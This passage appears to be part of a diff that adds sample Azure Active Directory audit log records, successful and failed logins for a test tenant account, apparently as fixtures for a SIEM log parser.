"IntraSystemId": "f54da4fe-0a54-45f3-b6ea-39f873eb6000", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "RequestType", "Value": "Login:login"}, {"Name": "ResultStatusDetail", "Value": "Success"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "b0c1c4a7-c6db-4f14-b628-54e37a7a6785"}
+{"InterSystemsId": "6ae96167-2df2-425c-9f91-27e6345eb782", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-07T16:43:02", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "81.2.69.143", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "81.2.69.143", "LogonError": "UserStrongAuthClientAuthNRequiredInterrupt", "ApplicationId": "4345a7b9-9a63-4910-a426-35363201d503", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "00000002-0000-0000-c000-000000000000"}], "ObjectId": "00000002-0000-0000-c000-000000000000", "ModifiedProperties": [], "ResultStatus": "Failed", "IntraSystemId": "7fa5e138-ac87-4063-a278-56c6c6965e00", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "FlowTokenScenario", "Value": "Login"}, {"Name": "UserAuthenticationMethod", "Value": "1"}, {"Name": "RequestType", "Value": "Login:login"}, {"Name": "ResultStatusDetail", "Value": "Success"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoginFailed", "Id": "82d834e4-f6f2-476a-902e-e1e9fd6f87d8"}
+{"InterSystemsId": "6b9a8662-857f-45e4-bbb2-d106d5aab41e", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-12T21:38:19", "Actor": [{"Type": 0, "ID": "Unknown"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "216.160.83.57", "UserId": "Unknown", "UserType": 5, "UserKey": "Not Available", "ClientIP": "216.160.83.57", "LogonError": "None", "ApplicationId": "", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "Unknown"}], "ObjectId": "Unknown", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "0fee3b91-5e56-45f6-9b3c-792602b1e500", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "RequestType", "Value": "OAuth2:Logout"}, {"Name": "ResultStatusDetail", "Value": "Success"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "e5e2c41a-55ea-4681-9d64-78ddd7145bd2"}
+{"InterSystemsId": "6bab76a8-98bd-42e4-b722-a31fe81b030a", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-07T16:43:40", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "81.2.69.143", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "81.2.69.143", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "5f09333a-842c-47da-a157-57da27fcbca5"}], "ObjectId": "5f09333a-842c-47da-a157-57da27fcbca5", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "c3ebcde8-62f6-4cc4-8e0c-c11c08e76100", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "True"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "2a23206a-2f5d-4cb7-aeb8-f285d10e6f80"}
+{"InterSystemsId": "6fee997e-1b2a-4a95-a8be-ea85642ed652", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T15:30:58", "Actor": [{"Type": 0, "ID": "Unknown"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "175.16.199.1", "UserId": "Unknown", "UserType": 5, "UserKey": "Not Available", "ClientIP": "175.16.199.1", "LogonError": "None", "ApplicationId": "", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "Unknown"}], "ObjectId": "Unknown", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "8b270c82-1240-4a0a-ac15-1e1116261400", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "RequestType", "Value": "OAuth2:Logout"}, {"Name": "ResultStatusDetail", "Value": "Success"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "c0a0d198-825b-4e39-b868-0a7b0552b209"}
+{"InterSystemsId": "6fee997e-1b2a-4a95-a8be-ea85642ed652", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T15:31:33", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "LogonError": "UserStrongAuthClientAuthNRequiredInterrupt", "ApplicationId": "c44b4083-3bb0-49c1-b47d-974e53cbdf3c", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "797f4846-ba00-4fd7-ba43-dac1f8f63013"}], "ObjectId": "797f4846-ba00-4fd7-ba43-dac1f8f63013", "ModifiedProperties": [], "ResultStatus": "Failed", "IntraSystemId": "b0faaf7a-913e-4a93-8ccc-ecfaa2b42400", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "FlowTokenScenario", "Value": "Login"}, {"Name": "UserAuthenticationMethod", "Value": "1"}, {"Name": "RequestType", "Value": "Login:login"}, {"Name": "ResultStatusDetail", "Value": "Success"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoginFailed", "Id": "52b07191-3887-40fb-a001-f4122b0851d1"}
+{"InterSystemsId": "6fee997e-1b2a-4a95-a8be-ea85642ed652", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:14:25", "Actor": [{"Type": 0, "ID": "Unknown"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "175.16.199.1", "UserId": "Unknown", "UserType": 5, "UserKey": "Not Available", "ClientIP": "175.16.199.1", "LogonError": "None", "ApplicationId": "", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "Unknown"}], "ObjectId": "Unknown", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "d949d6c2-472e-4901-bd70-96cbfe534c00", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "RequestType", "Value": "OAuth2:Logout"}, {"Name": "ResultStatusDetail", "Value": "Success"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "c62fa78d-daab-494e-a638-8321ebd71b9e"}
+{"InterSystemsId": "6fee997e-1b2a-4a95-a8be-ea85642ed652", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:14:51", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "LogonError": "UserStrongAuthClientAuthNRequiredInterrupt", "ApplicationId": "c44b4083-3bb0-49c1-b47d-974e53cbdf3c", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "797f4846-ba00-4fd7-ba43-dac1f8f63013"}], "ObjectId": "797f4846-ba00-4fd7-ba43-dac1f8f63013", "ModifiedProperties": [], "ResultStatus": "Failed", "IntraSystemId": "42c7ec91-1e2f-4505-b728-3a165b244f00", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "FlowTokenScenario", "Value": "Login"}, {"Name": "UserAuthenticationMethod", "Value": "1"}, {"Name": "RequestType", "Value": "Login:login"}, {"Name": "ResultStatusDetail", "Value": "Success"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoginFailed", "Id": "73c76212-8120-4e21-a383-c80d8327b606"}
+{"InterSystemsId": "6fee997e-1b2a-4a95-a8be-ea85642ed652", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:29:56", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "ApplicationId": "c44b4083-3bb0-49c1-b47d-974e53cbdf3c", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "797f4846-ba00-4fd7-ba43-dac1f8f63013"}], "ObjectId": "797f4846-ba00-4fd7-ba43-dac1f8f63013", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "8b8e8663-8a8c-4959-a692-e3eece085300", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Success"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "29f94716-3717-4671-962e-9c739b764f07"}
+{"InterSystemsId": "6fee997e-1b2a-4a95-a8be-ea85642ed652", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:51:23", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "ApplicationId": "c44b4083-3bb0-49c1-b47d-974e53cbdf3c", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "797f4846-ba00-4fd7-ba43-dac1f8f63013"}], "ObjectId": "797f4846-ba00-4fd7-ba43-dac1f8f63013", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "361dd87e-3bc9-4f0a-b236-ed7365e28d00", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Success"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "17d02385-1e30-45b7-949c-4d3dd549a0e7"}
+{"InterSystemsId": "6fee997e-1b2a-4a95-a8be-ea85642ed652", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-12T21:39:45", "Actor": [{"Type": 0, "ID": "Unknown"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "216.160.83.57", "UserId": "Unknown", "UserType": 5, "UserKey": "Not Available", "ClientIP": "216.160.83.57", "LogonError": "None", "ApplicationId": "", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "Unknown"}], "ObjectId": "Unknown", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "32b4cec1-00eb-44ea-be73-adc82387db00", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "RequestType", "Value": "OAuth2:Logout"}, {"Name": "ResultStatusDetail", "Value": "Success"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "e3346dd0-ecf6-4676-8765-365c7370b6fe"}
+{"InterSystemsId": "6fee997e-1b2a-4a95-a8be-ea85642ed652", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-12T21:40:16", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "216.160.83.57", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "216.160.83.57", "LogonError": "UserStrongAuthClientAuthNRequiredInterrupt", "ApplicationId": "c44b4083-3bb0-49c1-b47d-974e53cbdf3c", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "797f4846-ba00-4fd7-ba43-dac1f8f63013"}], "ObjectId": "797f4846-ba00-4fd7-ba43-dac1f8f63013", "ModifiedProperties": [], "ResultStatus": "Failed", "IntraSystemId": "a063e495-5883-4837-8186-582817fdd500", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "FlowTokenScenario", "Value": "Login"}, {"Name": "UserAuthenticationMethod", "Value": "1"}, {"Name": "RequestType", "Value": "Login:login"}, {"Name": "ResultStatusDetail", "Value": "Success"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoginFailed", "Id": "a772fd76-847f-4703-90f1-37eb81c9f392"}
+{"InterSystemsId": "7766ac63-ae7f-43e6-868a-a5422a96fd8b", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-08T14:33:52", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "67.43.156.12", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "67.43.156.12", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "5f09333a-842c-47da-a157-57da27fcbca5"}], "ObjectId": "5f09333a-842c-47da-a157-57da27fcbca5", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "adc9d69c-8ae6-41c7-b685-331453060a00", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "True"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "487e4f43-53db-4d6f-a314-5355746d4853"}
+{"InterSystemsId": "781c1055-e731-48ee-a806-c3f39ba160e3", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-12T10:53:24", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "216.160.83.57", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "216.160.83.57", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "5f09333a-842c-47da-a157-57da27fcbca5"}], "ObjectId": "5f09333a-842c-47da-a157-57da27fcbca5", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "e7fe21ea-ec03-46dd-b272-0a72ebbeac00", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "41f6b2dc-4db6-444c-93d9-829a842b87e2"}
+{"InterSystemsId": "82b07417-7b33-4531-952f-d3f719e2356a", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-07T16:43:22", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "81.2.69.143", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "81.2.69.143", "ApplicationId": "00000002-0000-0ff1-ce00-000000000000", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "00000002-0000-0ff1-ce00-000000000000"}], "ObjectId": "00000002-0000-0ff1-ce00-000000000000", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "280b3410-9d51-4ce3-952d-5bba0bea6600", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Success"}, {"Name": "KeepMeSignedIn", "Value": "True"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "ec9fa29b-6201-456d-b228-ca1759e0bf6c"}
+{"InterSystemsId": "8571fe85-eb4a-430d-b468-97900e344923", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-06T09:28:04", "Actor": [{"Type": 0, "ID": "Unknown"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "175.16.199.1", "UserId": "Unknown", "UserType": 5, "UserKey": "Not Available", "ClientIP": "175.16.199.1", "LogonError": "None", "ApplicationId": "", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "Unknown"}], "ObjectId": "Unknown", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "d239e473-6687-4ff9-ac65-0e3c59961600", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "RequestType", "Value": "OAuth2:Logout"}, {"Name": "ResultStatusDetail", "Value": "Success"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "e988fd90-2eff-4ad7-9f02-030a9d73ad6e"}
+{"InterSystemsId": "8d662bc0-0011-424d-a7dc-56bfc5a142b4", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-12T21:38:35", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "216.160.83.57", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "216.160.83.57", "ApplicationId": "00000002-0000-0ff1-ce00-000000000000", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "00000002-0000-0ff1-ce00-000000000000"}], "ObjectId": "00000002-0000-0ff1-ce00-000000000000", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "d0a4e1ed-206d-4602-aaae-406a02c5c300", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Success"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "3cbf15a5-84d0-4b0e-ba8e-c3ed43477293"}
+{"InterSystemsId": "9270f20a-56f2-493e-b6a7-a859adcaf626", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:13:36", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "ApplicationId": "00000002-0000-0ff1-ce00-000000000000", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "00000002-0000-0ff1-ce00-000000000000"}], "ObjectId": "00000002-0000-0ff1-ce00-000000000000", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "97aa710f-536f-44c8-a8d5-711dc55f5500", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Success"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "d2bb7eae-bc6e-42d2-b270-a885ec626235"}
+{"InterSystemsId": "97c52753-c410-438f-89e2-22741e5ccc6a", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-12T10:51:49", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "216.160.83.57", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "216.160.83.57", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "Unknown"}], "ObjectId": "Unknown", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "c9ef5d5f-e3af-4669-b465-921d8b58bd00", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "03de6d95-b955-451c-8311-473b6853d774"}
